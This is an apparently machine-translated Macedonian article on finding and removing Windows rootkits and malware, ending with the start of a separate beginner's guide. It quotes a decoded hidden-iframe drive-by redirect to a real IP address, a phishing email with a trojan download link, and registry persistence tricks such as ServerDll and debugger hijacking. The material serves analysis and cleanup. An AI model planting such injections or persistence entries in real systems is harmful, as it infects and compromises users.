Веројатно повеќе пати сте виделе информации во медиумите дека се појавил нов страшен вирус, кој може да доведе до нова страшна епидемија и речиси до крајот на Интернетот. Или дека се појавила нова технологија за пишување вируси, заснована на употребата на најмалку значајни битови од пиксели во графичките слики, а телото на вирусот е речиси невозможно да се открие. Или ... многу други грди работи. Понекогаш вирусите даваат речиси разум и самосвест. Ова се случува затоа што многу корисници, збунети во сложената класификација и детали за механизмот на функционирање на вирусите, забораваат дека, пред сè, секој вирус е компјутерска програма, т.е. збир на инструкции (инструкции) на процесорот дизајнирани на одреден начин. Не е важно во каква форма постои овој сет (извршна датотека, скрипта, дел од секторот за подигање или група сектори надвор од датотечниот систем) - многу поважно е оваа програма да не може да ја преземе контролата, т.е. започнете со извршување. Снимено на вашиот HDD, но не работи со вирус, е безопасно како и секоја друга датотека. Главната задача во борбата против вирусите не е да се открие телото на вирусот, туку да се спречи можноста за негово лансирање. Затоа, компетентните производители на вируси постојано ги подобруваат не само технологиите за воведување малициозни софтверво системот, но и методи на тајно лансирање и работење.
Како компјутерот се заразува со малициозен софтвер (вирус)? Одговорот е очигледен - некоја програма мора да работи. Идеално - со административни права, по можност - без знаење на корисникот и незабележливо за него. Методите на лансирање постојано се подобруваат и се засноваат, не само на целосно мамење, туку и на карактеристики или недостатоци. операционен системили апликативен софтвер. На пример, употребата на функцијата за автоматско активирање за пренослив медиум во опкружувањето на оперативните системи од семејството Виндоус доведе до ширење на вируси на флеш-уредите. Функциите за автоматско извршување обично се повикуваат од пренослив медиум или од споделени мрежни папки. Датотеката се обработува при автоматско стартување Autorun.inf. Оваа датотека одредува кои команди ги извршува системот. Многу компании ја користат оваа функција за да лансираат инсталатери на нивните софтверски производи, меѓутоа, производителите на вируси исто така почнаа да ја користат. Како резултат на тоа, можете да заборавите на автоматското стартување како погодност кога работите на компјутер. - повеќето писмени корисници ја оневозможија оваа опција засекогаш.
За да ги оневозможите функциите за автоматско стартување во Windows XP/2000 reg-датотеката што треба да се увезе во регистарот.
За Windows 7 и понова верзија, можете да ја оневозможите AutoPlay со користење на аплетот AutoPlay во Контролната табла. Во овој случај, оневозможувањето се однесува на тековниот корисник. Посигурен начин за заштита од воведување на вируси што се носат на отстранливи уреди е да се блокира автоматското стартување за сите корисници кои користат групни политики:
Но, главниот "добавувач" на вируси, се разбира, е Интернетот и, како главен апликативен софтвер - "Интернет прелистувач" (прелистувач). Веб-страниците стануваат покомплексни и поубави, се појавуваат нови мултимедијални функции, социјалните мрежи растат, бројот на сервери постојано се зголемува и бројот на нивните посетители расте. Интернет прелистувачот постепено станува сложен софтверски пакет- толкувач на податоци добиени однадвор. Со други зборови, во софтверски пакет кој извршува програми базирани на непозната содржина. Програмерите на прелистувачи (прелистувачи) постојано работат на подобрување на безбедноста на нивните производи, но производителите на вируси исто така не стојат во место, а веројатноста за заразување на малициозен софтвер системот останува доста висока. Постои мислење дека ако не посетувате „страници за возрасни“, страници со сериски броевисофтверски производи итн. тогаш инфекцијата може да се избегне. Ова не е сосема точно. На интернет има многу хакирани сајтови, чии сопственици не се ни свесни за хакирањето. И одамна помина времето кога хакерите ја забавуваат својата суета со замена на страници (оцрнување). Сега ваквото хакирање обично е придружено со воведување на сосема респектабилна страница на страниците, специјален код за заразување на компјутерот на посетителот. Покрај тоа, продавачите на вируси ги користат најпопуларните барања за пребарување за прикажување на заразени страници во SERPs. пребарувачите. Особено популарни се барањата со фразите „преземи бесплатно“ и „преземи без регистрација и СМС“. Обидете се да не ги користите овие зборови во прашањата за пребарување, инаку ризикот од добивање врски до малициозни страници значително се зголемува. Особено ако барате популарен филм кој сè уште не е објавен или последен концерт на некој познат бенд.
Ќе се обидам на поедноставен начин да го објаснам механизмот на инфицирање на компјутерот на посетителот на страницата со пример. Не толку одамна, при посета на прилично популарна локација, добив известување од програмата за мониторинг на стартување (PT Startup Monitor) дека апликацијата rsvc.exeобидувајќи се да запишете во регистарот. Апликацијата беше успешно убиена од FAR, а промените во регистарот беа откажани од PT Startup Monitor. Анализата на страниците на страницата покажа присуство на чуден Javascript код кој врши операции за конвертирање на податоци од низа кои не се значаен текст. Javascript е поддржан од повеќето модерни прелистувачи и се користи во скоро сите веб-страници. Скриптата преземена од таквите страници се извршува од веб-прелистувач. Како резултат на бројни трансформации на линиите споменати погоре, беше добиен прилично едноставен код:
iframe src="http://91.142.64.91/ts/in.cgi?rut4" width=1 height=1 style="visibility: hidden"
Се мисли на извршувањето на CGI скриптата на серверот со IP адреса 91.142.64.91 (што нема никаква врска со посетената страница) во посебен прозорец (iframe ознака) со големина од 1 пиксел во ширина и 1 пиксел во висина, во невидлив прозорец. Резултатот е многу веројатна вирусна инфекција. Особено ако нема антивирус или нема да реагира на заканата. Овој пример на скриено пренасочување на посетител на злонамерна локација користејќи ја ознаката „iframe“ веројатно не е многу релевантен денес, но целосно покажува како, со посета на легална страница, можете тивко да посетите друга, не многу легална, без дури знаејќи го тоа. За жал, не постои апсолутна гаранција против вирусна инфекција и треба да бидете подготвени за фактот дека ќе мора сами да се справите со вирусот.
Неодамна, еден од главните трендови во развојот на малициозни програми беше употребата во нив на сите видови начини за заштита од откривање со антивирусни алатки - таканаречениот rootkit (rootkit) - технологија. Таквите програми често или не се откриени од антивируси или не се отстранети од нив. Во оваа статија, ќе се обидам да опишам повеќе или помалку универзална техника за откривање и отстранување на малициозен софтвер од заразен систем.
Отстранувањето на „висококвалитетен“ вирус станува сè понетривијална задача, бидејќи програмерите обезбедуваат таков вирус со својства што го отежнуваат неговото решавање колку што е можно. Доста често вирусот може да работи во режим на јадро и има неограничени можности за пресретнување и менување на функциите на системот. Со други зборови, вирусот има способност да ги скрие своите датотеки, клучеви од регистарот, мрежни врски, - се што може да биде знак за неговото присуство во инфицираниот систем. Може да го заобиколи секој заштитен ѕид, системи за откривање на упад и анализатори на протоколи. А, меѓу другото, може да работи и во безбеден режим. Windows подигање. Со други зборови, модерен малициозен софтвер е многу тешко да се открие и неутрализира.
Развојот на антивирусите исто така не застанува - тие постојано се подобруваат, а во повеќето случаи тие ќе можат да детектираат и неутрализираат малициозен софтвер, но порано или подоцна ќе има измена на вирусот што некое време ќе биде " премногу тешко“ за кој било антивирус. Затоа, самооткривањето и отстранувањето на вирусот е работа што порано или подоцна секој корисник на компјутер ќе мора да ја заврши.
Здраво.
Ние сме заинтересирани за вашата кандидатура, но ве повикуваме да ја пополните
нашата компанија продолжи со меморандуми и испратете ја на [заштитена е-пошта]
Одговорот не е загарантиран, сепак, ако нè интересира вашата биографија, ние ќе го направиме тоа
ќе ви се јавиме во рок од неколку дена. Не заборавај
наведете го телефонскиот број, како и позицијата за која аплицирате. Пожелно
укажуваат и на барањата за плата.
Нашиот меморандум можете да го преземете од врската подолу.
http://verano-konwektor.pl/resume.exe
Анализата на заглавијата на е-поштата покажа дека е испратена од компјутер во Бразил преку сервер во САД. Понуден е меморандум за преземање од сервер во Полска. И ова е со содржина на руски јазик.
Јасно е дека нема да видите никакви меморандуми и најверојатно ќе добиете тројанска програма на вашиот компјутер.
Преземање на датотеката resume.exe. Големина - 159744 бајти. Се додека не лансирам.
Копирање на датотеката на други компјутери каде што се инсталирани различни антивируси - само за повторно да се провери нивната ефикасност. Резултатите не се толку жешки - Антивирус Avast 4.8 Home Edition беше деликатно тивко. Симантек го лизна - истата реакција Работеше само AVG 7.5 Free Edition Се чини дека овој антивирус, всушност, не залудно добива на популарност.
Сите експерименти се извршени на Виртуелна машинасо оперативен систем Windows XP. Сметка со администраторски права, бидејќи, најчесто, вирусите успешно се воведуваат во системот само ако корисникот е локален администратор.
Се стартува. По некое време, заразената датотека исчезна, се чини дека вирусот ја започна својата валкана работа.
Однесувањето на системот не е променето надворешно. Очигледно е потребно рестартирање. За секој случај, ги оневозможувам TCP конекциите во заштитниот ѕид. Оставам само појдовни врски преку UDP:53 (DNS) дозволено - неопходно е да се остави вирусот барем малку можност да ја покаже својата активност. Како по правило, по воведувањето, вирусот треба да контактира со домаќинот или со даден сервер на Интернет, чиј знак ќе бидат барањата за DNS. Иако, повторно, во светлината на горенаведеното, паметен вирус може да ги маскира, покрај тоа, може да го заобиколи заштитниот ѕид. Гледајќи напред, ќе кажам дека тоа не се случи во овој конкретен случај, но за сигурна анализа на мрежната активност, подобро е целиот сообраќај на заразена машина да се препушти преку друга, незаразена машина, каде што можете да бидете сигурни дека се почитуваат правилата за заштитниот ѕид, а анализаторот на сообраќајот (јас користев Wireshark "th ) покажува што е всушност таму.
Се рестартира. Однадвор, ништо не се промени, освен што е невозможно да се пристапи на Интернет, бидејќи јас самиот ја исклучив оваа можност. Ништо ново не се појави во патеките, услугите или системските директориуми за автоматско стартување. Гледањето во дневникот на системот дава само еден поим - системот не успеа да ја стартува мистериозната услуга гранде48. Не можев да имам таква услуга, а со текот на времето овој настан се поклопи со моментот на имплементација. Други работи што сугерираат успешно распоредување се отсуството на запис во регистарот за услугата grande48 и отсуството на втора порака во системскиот дневник дека услугата не успеала да започне по рестартирање. Ова е најверојатно некаков надзор на пишувачите на вируси. Иако не е значајно, затоа што повеќето корисници не го гледаат дневникот на настани, па дури и во моментот на сомневање за инфекција, овој запис во дневникот можеби веќе го нема.
Утврдуваме присуство на вирус во системот.
1. Сигурно мора да има „лево“ сообраќај. Може да се одреди со помош на протоколарни анализатори. Јас користев Wireshark. Веднаш по преземањето, прво го стартувам. Така е, постои група на барања за DNS (како што се испостави подоцна - еднаш во 5 минути) за одредување на IP адресите на јазлите ysiqiyp.com, irgfqfyu.com, updpqpqr.com итн. Всушност, сите оперативни системи Виндоус сакаат да одат онлајн кога е потребно и не е потребно, антивирусите можат да ги ажурираат своите бази на податоци, па затоа е доста тешко да се утврди дали сообраќајот припаѓа на вирус. Обично, сакате да поминете сообраќај преку неинфицирана машина и сериозно да ја анализирате нејзината содржина. Но, ова е посебно прашање. Во принцип, индиректен знак за абнормална мрежна активност на системот може да бидат значајни вредности на сообраќајните бројачи на давателот, во услови на неактивен систем, бројачи од својствата на VPN-врската итн.
2. Ајде да се обидеме да користиме програми за пребарување на rootkits. Сега веќе има многу такви програми и лесно се наоѓаат на мрежата. Еден од најпопуларните е Марк Русинович, кој може да се преземе од делот Windows Sysinternals на веб-страницата на Microsoft. Инсталирањето не е потребно. Отпакувајте и стартувајте. Кликнете на „Скенирај“. По кратко скенирање, ги гледаме резултатите:
Патем, дури и без да навлезете во содржината на редовите, можете веднаш да забележите дека има записи или датотеки кои се многу „свежи“ во однос на времето на креирање / модификација (колона „Временски печат“). Пред сè, треба да нè интересираат датотеки со опис (колона "Опис") - „Скриено од Windows API“- скриено од Windows API. Сокривањето датотеки, записи во регистарот, апликации, се разбира, не е нормално. Две датотеки - grande48.sys
и Yoy46.sys
- само тоа го бараме. Ова е саканиот rootkit, регистриран под маската на драјвери или дел од него што обезбедува скришум. Присуството во списокот на други беше изненадување за мене. Тестирањето покажа дека е нормално. драјвери за прозорци xp. Покрај тоа, вирусот го криеше нивното присуство само во папката \систем32
, и нивните копии во \system32\dll кеш
остана видлива.
Дозволете ми да ве потсетам дека Windows XP користи специјален механизам за заштита на системските датотеки наречен Windows датотекаЗаштита (WFP). Целта на WFP е автоматски да ги обнови важните системски датотеки кога тие се бришат или заменуваат со застарени или непотпишани копии. Сите системски Windows датотеки XP се дигитално потпишани и наведени во посебна база на податоци што ја користи WFP. Папка се користи за складирање на копии од датотеки. \system32\dll кеш
и делумно, \Windows\двигател кеш
. Кога бришете или заменувате една од системските датотеки, WFP автоматски ја копира „точната“ копија од папката \dllcache. Ако наведената датотека не е во папката \dllcache, тогаш Windows XP бара од вас да го вметнете инсталационото ЦД на Windows XP во вашиот ЦД-уред. Обидете се да го отстраните vga.sys од \system32 и системот веднаш ќе го врати користејќи копија од dllcache. И ситуацијата кога, со работен систем за обновување на датотеки, датотеката на возачот е во \dllcache и не е видлива во \system32 - ова е исто така дополнителен знак за присуство на rootkit во системот.
Го отстрануваме вирусот од системот.
Единственото нешто што останува да се направи важна акција- отстранете го вирусот. Наједноставниот и сигурен начин- подигнете се во друг, неинфициран оперативен систем и оневозможете го стартувањето на драјверите на rootkit.
Ајде да ја користиме стандардната конзола за обновување на Windows. Го земаме инсталациониот диск за Windows XP и се подигаме од него. На првиот екран, изберете ја втората ставка од менито - притиснете R.
Изберете систем (ако има неколку):
Внесете ја администраторската лозинка.
Списокот на драјвери и услуги може да се види со помош на командата listsvc:
Навистина, списокот содржи Годишен46 , иако недостасува grande48, што значи дека датотеката за возачот grande48.sys е скриена во системот, но не е вчитана:
Конзолата за обновување ви овозможува да го оневозможите или дозволите стартувањето на драјверите и услугите користејќи команди оневозможии овозможи. Го забрануваме почетокот на Yoy46 со командата:
Ја возиме командата EXIT и системот оди на рестартирање.
По рестартирање, двигателот на rootkit нема да се вчита, што го олеснува бришењето на неговите датотеки и чистењето на регистарот од неговите записи. Можете да го направите тоа рачно, или можете да користите некој вид антивирус. Најефективен, од моја гледна точка, ќе биде бесплатен скенер базиран на добро познатиот антивирус Dr.Web од Игор Данилов. Можете да преземете од тука - http://freedrweb.ru
Таму може да преземете и „Dr.Web LiveCD“ - слика на дискот што ви овозможува да го вратите здравјето на системот погоден од вируси на работните станици и серверите со Windows\Unix, да копирате важни информации на пренослив медиум или друг компјутер, доколку дејствата на малициозните програми го оневозможија подигањето на компјутерот. Dr.Web LiveCD ќе ви помогне не само да го исчистите вашиот компјутер од заразени и сомнителни датотеки, туку и ќе се обиде да излечи заразени предмети. За да отстраните вирус, треба да преземете слика (датотека со наставката .iso) од страницата DrWeb и да ја запишете на ЦД. Ќе се креира диск за подигање, од кој ќе се подигне, ќе ве води едноставно и разбирливо мени.
Ако поради некоја причина не можете да го користите Dr.Web LiveCD, можете да го пробате Dr.Web CureIt! За да скенирате заразен систем, мора да го наведете неговиот хард диск (режим „Прилагодено скенирање“). Скенерот ќе ви помогне да ги пронајдете датотеките на вирусот и сè што треба да направите е да ги отстраните записите поврзани со него од регистарот.
Бидејќи вирусите научија да се регистрираат за да работат во режим на безбедно подигање, не е повредено да се провери филијалата на регистарот:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
Секции:
Минимална- список на драјвери и услуги започнати во безбеден режим (Безбеден режим)
мрежа- исто, но со мрежна поддршка.
Ќе додадам дека има нов класен rootkit, чиј претставник е BackDoor.MaosBootкоја се појави на крајот на 2007 година. Овој тројанец се запишува во секторот за подигање хард диски обезбедува скриена инсталација на неговиот драјвер во меморијата. Самиот двигател Rootkit е директно запишан на последните сектори на физичкиот диск, заобиколувајќи го датотечниот систем, кој го крие неговото присуство на дискот. Во принцип, принципот не е нов, пред десет години, малициозен софтвер беше слично маскиран на резервните патеки на флопи-дискови и хард дискови, но се покажа дека е многу ефикасен, бидејќи повеќето антивируси сè уште не можат да се справат со задачата да го отстранат BackDoor. MaosBoot. Секторот за подигање споменат погоре не проверува, а секторите на крајот на дискот за него во никој случај не се поврзани со датотечен систем и, се разбира, нема да открие таков rootkit. Точно, Dr.Web (и, следствено, Cureit) добро се справува со BackDoor.MaosBoot.
Ако се сомневате во која било датотека, можете да ја користите бесплатната онлајн антивирусна услуга virustotal.com. Преку посебен формулар почетна страницастраница, поставете сомнителна датотека и почекајте ги резултатите. Услугата virustotal користи конзолни верзии на многу антивируси за да ја провери вашата сомнителна датотека. Резултатите се прикажуваат на екранот. Ако датотеката е злонамерна, тогаш со висок степен на веројатност, ќе можете да го одредите ова. До одреден степен, услугата може да се користи за да се избере „најдобриот антивирус“.
врска до една од форумските теми на веб-страницата virusinfo.info, каде што корисниците објавуваат линкови до различни ресурси посветени на антивирусна заштита, вкл. и онлајн проверки на компјутер, прелистувач, датотеки...
Понекогаш, како резултат на неточни дејства на вирус (или антивирус), системот целосно престанува да се вчитува. Ќе дадам типичен пример. Злонамерните програми се обидуваат да се инфилтрираат во системот користејќи различни, вклучително и прилично невообичаени методи. За време на процесот на подигање, дури и пред регистрацијата на корисникот, се стартува "Session Manager" (\SystemRoot\System32\smss.exe), чија задача е да започне потсистеми и услуги (услуги) на високо ниво на оперативниот систем. Овој чекор ги започнува CSRSS (процес на траење на серверот на клиентот), WINLOGON (најава за Windows), LSASS (LSA школка) и преостанатите услуги со параметарот Start=2 од клучот во регистарот
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Services
Информациите наменети за менаџерот на сесии се во клучот за регистар
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager
Еден од начините за инјектирање во системот е да ја замените датотеката dll за CSRSS. Ако ја погледнете содржината на записот
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\SubSystems
Ќе го најдете значењето
ServerDll=basesrv, ServerDll=winsrv. Библиотеките basesrv.dll и winsrv.dll се „соодветни“ системски датотеки вчитани од CSRSS на нормален (неинфициран) систем. Овој запис во регистарот може да се смени во запис што обезбедува вчитување, на пример, наместо basesrv.dll, злонамерен basepvllk32.dll:
ServerDll=basepvllk32 (или некој друг dll освен basesrv и winsrv)
Ова ќе осигури дека, при следното рестартирање, малициозниот софтвер е под контрола. Ако вашиот антивирус го открие и отстрани вградениот basepvllk32, оставајќи го записот во регистарот недопрен, тогаш системот ќе се подигне со син екран на смртта (BSOD) со грешка СТОП c000135 и порака за неможноста да се вчита basepvllk32.
Можете да ја поправите ситуацијата вака:
Подигнете се во конзолата за обновување (или кој било друг систем) и копирајте ја датотеката basesrv.dll од папката C:\WINDOWS\system32 во истата папка под името basepvllk32.dll. После тоа, системот ќе се подигне и можете рачно да го поправите записот во регистарот.
- подигнете со помош на Winternals ERD Commander и поправете го записот во регистарот ServerDll=basesrv. Или извршете обновување на системот користејќи точка за враќање.
Друг типичен пример. Злонамерниот софтвер се регистрира како дебагер за процесот explorer.exe со создавање запис во регистарот како:
"Debugger"="C:\Program Files\Microsoft Common\wuauclt.exe"
Бришењето wuauclt.exe со антивирус без бришење запис во регистарот го оневозможува стартувањето на explorer.exe. Како резултат на тоа, добивате празна работна површина, без никакви копчиња и кратенки. Можете да излезете од ситуацијата користејќи ја комбинацијата на копчиња CTRL-ALT-DEL. Изберете "Task Manager" - "New Task" - "Browse" - пронајдете и стартувајте го уредникот на регистарот regedit.exe. Потоа избришете го клучот
HKM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe
и рестартирај.
Во случај кога точно знаете кога системот бил заразен, враќањето во точка за враќање пред овој настан е прилично сигурен начин да се ослободите од инфекцијата. Понекогаш има смисла да се изврши не целосно враќање, туку делумно, со обновување на датотеката во регистарот SYSTEM, како што е опишано во написот „Проблеми со вчитување на ОС“ делот „Windows“
== мај 2008. ==
Додаток
Овој додаток се појави една година откако беше напишана главната статија. Овде решив да ги поставам најинтересните решенија што се појавија во процесот на борба против малициозен софтвер. Некако како кратки белешки.
По отстранувањето на вирусот, ниту еден антивирус не работи.
Случајот е интересен бидејќи методот на блокирање на антивирусен софтвер може да се користи и во борбата против извршните датотеки со вируси. Сè започна со фактот дека по отстранувањето на прилично примитивен вирус, лиценцираниот „Stream Anti-Virus“ не функционираше. Реинсталирањето и чистењето на регистарот не помогна. Обидот да се инсталира Avira Antivir Personal Free беше успешен, но самиот антивирус не започна. Имаше порака во системскиот дневник за истек на време при стартување на услугата „Avira Antivir Guard“. Рачното рестартирање заврши со истата грешка. Покрај тоа, не беа извршени непотребни процеси во системот. Имаше стопроцентна сигурност дека нема вируси, rootkits и друга нечистотија (Malware) во системот.
Во одреден момент се обидов да трчам антивирусна алаткаА.В.З. Принципот на работа на AVZ во голема мера се заснова на пребарување на различни аномалии во системот што се проучува. Од една страна, ова помага во пребарувањето за малициозен софтвер, но од друга страна, сомневањата за компонентите на антивируси, антиспајвер и други легитимни софтвери кои активно комуницираат со системот се сосема природни. За да се потисне одговорот на AVZ на легитимните објекти и да се поедностави анализата на резултатите од скенирањето на системот со означување на легитимните објекти со боја и филтрирање од дневниците, се користи базата на податоци за безбедни датотеки AVZ. Неодамна, лансирана е целосно автоматска услуга која им овозможува на сите да испраќаат датотеки за да ја надополнат оваа база на податоци.
Но: извршната датотека avz.exe не започна! Го преименувам avz.exe во musor.exe - сè започнува добро. Уште еднаш, AVZ се покажа како незаменлив асистент во решавањето на проблемот. При вршење на проверки, во резултатите се појавија следниве линии:
Опасно - процесно дебагер "avz.exe"="ntsd-d"
Опасно - процесирајте дебагер "avguard.exe"="ntsd-d"
:.
Веќе беше голем хит. Пребарувањето во регистарот за контекстот „авз“ резултираше со откритие во филијалата
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Именуван дел avz.exe, кој содржи стринг параметар именуван „дебагер“и значење.
И, како што се испостави подоцна, во оваа гранка немаше само делот „avz.exe“, туку и делови со имиња на извршни модули на скоро сите познати антивируси и некои комунални услуги за следење на системот. Самиот ntsd.exe е целосно легален дебагер на Windows кој е стандардно присутен во сите верзии на ОС, но таквиот запис во регистарот го оневозможува стартувањето на апликација чие име на извршна датотека се совпаѓа со името на делот ???.exe .
Откако ги отстранивте од регистарот сите делови со име ???.exe и го содржат записот "Debugger" = "ntsd -d", системот беше целосно обновен.
Како резултат на анализата на ситуацијата користејќи ја опцијата "ntsd -d" за блокирање на стартувањето на извршните датотеки, се појави идејата да се користи истиот трик за борба против самите вируси. Се разбира, ова не е лек, но до одреден степен може да ја намали заканата од компјутерска инфекција од вируси со познати имиња на извршни датотеки. Со цел да се оневозможи извршувањето на датотеки со имињата ntos.exe, file.exe, system32.exe итн. во системот. можете да креирате датотека .reg за увоз во регистарот:
Windows Registry Editor верзија 5.00
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
"Debugger"="ntsd -d"
:.. итн.
Имајте предвид дека името на делот не ја содржи патеката на датотеката, така што овој метод не може да се користи за датотеки со вируси чии имиња се совпаѓаат со имињата на легалните извршни датотеки, но самите датотеки се нестандардно лоцирани во датотечниот систем. На пример, Explorer.exe се наоѓа во папката \WINDOWS\, а вирусот се наоѓа на друго место - во коренот на дискот, во папката \temp, \windows\system32\ Ако креирате партиција со име "Explorer. exe" - потоа откако ќе се најавите, ќе добиете празна работна површина бидејќи File Explorer нема да започне. Уште полошо, ако креирате партиција со исто име како системска услуга (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), ќе завршите со паднат систем. Ако вирусот се наоѓа во C:\temp\winlogon.exe и легитимниот модул за најава е C:\WINDOWS\SYSTEM32\winlogon.exe, создавањето партиција со име winlogon.exe ќе предизвика услугата winlogon да не стартува и да го урне системот со син екран на смртта (BSOD).
Но, сепак, не треба да се надеваме дека кодот што го бара вирусот ќе биде соодветен во секој конкретен случај. Како да не се надевате на искрено самоуништување на вирусот, а уште повеќе, не треба да испраќате СМС. Секој вирус може да се отстрани, дури и ако не е откриен од антивируси. Методите за отстранување на ransomware не се разликуваат од методите за отстранување на кој било друг малициозен софтвер, со можеби една разлика - не треба да губите време обидувајќи се да се справите со ѓубрето во заразено системско опкружување, освен да ги развиете вашите сопствени вештини и да го надополнувате вашето знаење.
Наједноставниот и најефективниот начин е да се подигне со помош на друг, неинфициран систем и, поврзувајќи се со заразениот, да ги избришете датотеките со вируси и да ги поправите записите во регистарот направени од него. Веќе напишав за ова погоре, во главниот дел од статијата, но овде ќе се обидам едноставно да наведам неколку кратки опции за отстранување на вирусот.
Користењето на Dr.Web LiveCD е најлесниот начин и не бара посебно знаење. Преземете ја изо сликата на ЦД-то, запишете ја на диск, подигнете ја од ЦД-РОМ-от и стартувајте го скенерот. Користење Winternals ERD Commander. Подигнете се од него со поврзување со заразениот систем и вратете се во точка за враќање со датум кога сè уште немало инфекција. Изберете мени Системски алатки - Враќање на системот. Ако враќањето со користење на ERD Commander не е можно, обидете се рачно да ги пронајдете датотеките во регистарот во податоците на контролната точка и да ги вратите во директориумот на Windows. Детално опишав како да го направите ова во написот "Работа со регистарот". Вчитување во друг оперативен систем и рачно отстранување на вирусот. Најтешко, но најтешко ефективен метод. Како друг оперативен систем, најзгодно е да се користи истиот ERD Commander. Техниката за откривање и отстранување на вирус може да биде како што следува:
Одете на дискот на заразениот систем и прелистајте ги системските директориуми за извршни датотеки и датотеки со драјвери со датум на создавање близок до датумот на инфекција. Преместете ги овие датотеки во посебна папка. Обрнете внимание на директориумите
\ Windows
\Windows\system32
\Windows\system32\drivers
\Windows\Tasks\
\РЕЦИКЛИРАЧ
\Информации за јачината на звукот на системот
Кориснички директориуми \Документи и поставки\Сите корисниции \Документи и поставки\корисничко име
Многу е погодно да се користи FAR Manager за пребарување на такви датотеки, со овозможено сортирање по датум за панелот каде што се прикажуваат содржините на директориумот (комбинација CTRL-F5). Посебно внимание треба да се посвети на скриените извршни датотеки. Исто така, постои ефикасна и едноставна алатка од Nirsoft - SearchMyFiles, чија употреба овозможува, во огромното мнозинство на случаи, лесно да откриете малициозни датотеки дури и без користење на антивирус. Како да откриете малициозни датотеки по време на создавање (време на создавање)
Се поврзувате со регистарот на заразениот систем и барате линкови до имињата на овие датотеки во него. Самиот регистар не го попречува претходното копирање (целосно или, барем, оние делови каде што се наоѓаат горенаведените врски). Вие самите ги бришете врските или ги менувате имињата на датотеките во нив во други, на пример, file.exe во file.ex_, server.dll во server.dl_, driver.sys во driver.sy_.
Овој методне бара посебно знаење и во случаи кога вирусот не го менува датумот на модификација на неговите датотеки (и ова е сè уште многу ретко) - дава позитивен ефект. Дури и ако вирусот не е откриен од антивируси.
Ако претходните методи не дадоа резултати, останува едно - рачно пребарување опциилансирање на вирусот. На менито Административни алаткиКомандант на ERD „и има ставки:
автомати- информации за опциите за стартување на апликацијата и корисничката школка.
Менаџер за сервис и возач- информации за услугите и драјверите на системот.
Почетните корисници на компјутери доста често се наоѓаат во тешка ситуација, бидејќи прашањата што ги имаат, другите, понапредни корисници ги сметам за банални. Токму поради оваа причина, многу често одговорите на овие прашања тешко се наоѓаат на Интернет, или на прашањата одговара човек кој веќе заборавил што значи да се биде почетник, што значи дека користи терминологија и техники кои само уште повеќе го збуни почетникот.
Ова исто така важи и за таква тривијална задача како пребарување и отстранување на вируси.
Решив да создавам чекор по чекор инструкции, во кој ќе покажам како би постапил доколку наидам на злонамерна програма.
Како да одредите дали вашиот компјутер е заразен со вирус
На почетокот, има смисла да се зборува за знаците кои експлицитно или индиректно укажуваат на вирусна инфекција.
Прво, ова е известување дека се прикажува антивирусот инсталиран на вашиот компјутер. Ова известување може да изгледа различно, а неговиот текст може да се разликува во зависност од конкретната антивирусна програма.
Но, не брзајте веднаш да паничите. Секогаш постои шанса антивирусот да направи грешка или да го игра на безбедно.
Никогаш не се заморувам да го повторувам тоа антивирусен софтвер не е лек!
Ниту еден антивирус во светот не може да биде 100% ефикасен, бидејќи развивачите на вируси и малициозен софтвер СЕКОГАШ се чекор понапред - прво се појавува вирус, па дури потоа почнуваат да се борат со него.
Многу почетници корисници имаат погрешна идеја за тоа како функционира антивирусот. Тие сметаат дека антивирусот во својата работа се води само од антивирусни бази на податоци кои секојдневно се ажурираат. Ова е вистина, но делумно.
Стотици и илјадници нови вируси се појавуваат секој ден, и не секогаш им се доделува единствено име, под кое се внесуваат во антивирусната база на податоци. Само навистина единствен малициозен софтвер ја добива оваа привилегија. Остатокот од „вирусни производи за широка потрошувачка“ се создава, по правило, со помош на помошни конструкторски програми и антивирусот може да фати такви вируси според одредени критериуми (хеуристички анализатор).
Ако некоја програма или датотека се однесува сомнително според антивирусот, односно однесувањето потпаѓа под одредени критериуми утврдени во антивирусот, тогаш ќе ги блокира и ќе прикаже порака. Всушност, датотеката може да биде прилично безопасна.
Затоа, антивирусот треба да се зема исклучиво како аларм, кој може да има (и често има) лажни позитиви.
Меѓутоа, ако антивирусот се „сомневал“ и блокирал нешто, тогаш треба целосно да го проверите компјутерот. Во исто време, би препорачал да го направите ова не само со помош на антивирус инсталиран на вашиот компјутер, туку и да користите алтернативно решение. Односно, по целосно скенирање со инсталираниот антивирус, направете второ скенирање со друг антивирусна програма, за што ќе зборувам малку подоцна.
Исто така, секоја итна ситуација може да стане причина да го проверите вашиот компјутер за вируси. На пример, компјутерот почна да успорува или одеднаш се рестартира, грешките почнаа да се појавуваат при стартување на програмите или кога оперативниот систем работи ... Во принцип, секое ненормално однесување на компјутерот треба да се земе како сигнал - вреди да се провери компјутерот со антивирус.
Како да го проверите вашиот компјутер за вируси
Како што веќе спомнав, од моја гледна точка, би било правилно да го проверите компјутерот не само со антивирусот инсталиран на компјутерот, туку и со второто, добро докажано антивирусно решение.
Со ова, НЕ мислам да инсталирате втор антивирус на вашиот компјутер! НЕ! Ова не може да се направи!
Мислам, употребата на антивирусни скенери што може да се преземат и работат без инсталација, или подобро дури и од бутабилен USB флеш драјв.
Факт е дека ако вашиот компјутер е заразен, тогаш вирусот може да се скрие во системот и да ги блокира обидите на инсталираниот антивирус да го открие или отстрани.
Кога го подигате компјутерот од специјално креиран флеш драјв, тој ќе започне свој оперативен систем (обично Linux). Ова значи дека сите датотеки на вашиот хард диск ќе бидат достапни, бидејќи нема да бидат заштитени со оперативниот систем Windows што е инсталиран на тврдиот диск на вашиот компјутер.
На овој начин, можеме најефективно да ги провериме сите ќошиња и празнини на вашиот хард диск и со поголема веројатност да откриеме закани.
Таквите бутабилни флеш-уреди ви овозможуваат да креирате многу модерни антивируси. Тоа е, можете да отидете во менито на антивирусот инсталиран на вашиот компјутер и да го користите за да креирате бутабилен флеш диск. Но, ова е под услов вашиот антивирус да има таква функција. Можете да дознаете за ова во системот за помош на вашата антивирусна програма.
